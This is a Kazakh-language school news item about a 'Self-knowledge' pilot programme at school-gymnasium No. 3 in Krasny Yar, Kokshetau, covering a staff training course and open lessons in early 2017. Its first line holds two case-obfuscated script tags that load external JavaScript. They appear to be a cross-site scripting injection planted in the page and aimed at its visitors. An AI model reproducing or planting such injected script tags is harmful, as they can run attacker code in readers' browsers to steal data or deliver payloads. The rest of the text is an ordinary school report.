<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.02.2017

Ақмола облысы Көкшетау қаласы білім бөлімінің №3 КрасныйЯр көпсалалы

орта мектеп-гимназиясында «Өзін-өзі  тану» рухани-адамгершілік білім берудің пилоттық бағдарламасы бойынша  ақпан айында жүргізіліп жатқан жұмыстар туралы

№3 Красный Яр көпсалалы орта мектеп-гимназиясы «Өзін-өзі  тану» рухани-адамгершілік білім берудің пилоттық бағдарламасына ұсынылып жұмыс жүргізіліп жатыр. Бағдарлама талаптарына сәйкес мектеп-гимназия басшысы Қ.Қ Шаймерденов қалалық білім бөлімі мен Ақмола облыстық «Өрлеу» БАҰО басшылығымен келісе отырып мектеп әкімшілігі мен ұстаздарға арналған білім жетілдіру курсын ұйымдастырды. 23.01-03.02.2017 жылы мектеп-гимназия қарамағында мектеп әкімшілігі мен пән мұғалімдерінен жиыны 25 адамға Ақмола облыстық «Өрлеу» БАҰО маманы А.Б.Абдраимованың өткізуімен  «Өзін - өзі тану пәнінің ғылыми-әдістемелік негіздері» тақырыбында білім жетілдіру курсы өтті.  Мектеп –гимназияда «Өзін-өзі  тану» кабинеті жұмысы жандандырылуда, сынып жетекшілері мен пән мұғалімдері «Өзін-өзі  тану» рухани-адамгершілік білім берудің пилоттық бағдарламасы бойынша құжаттарын жинақтады. «Өзін-өзі  тану» онкүндігі жұмысын бастап, мұғалімдер ашық сабақтар және сыныптан тыс іс-шаралар өтіп жатыр.

Просмотров: 395


Пікір қосу



Деректерді қолтаңбаға қосу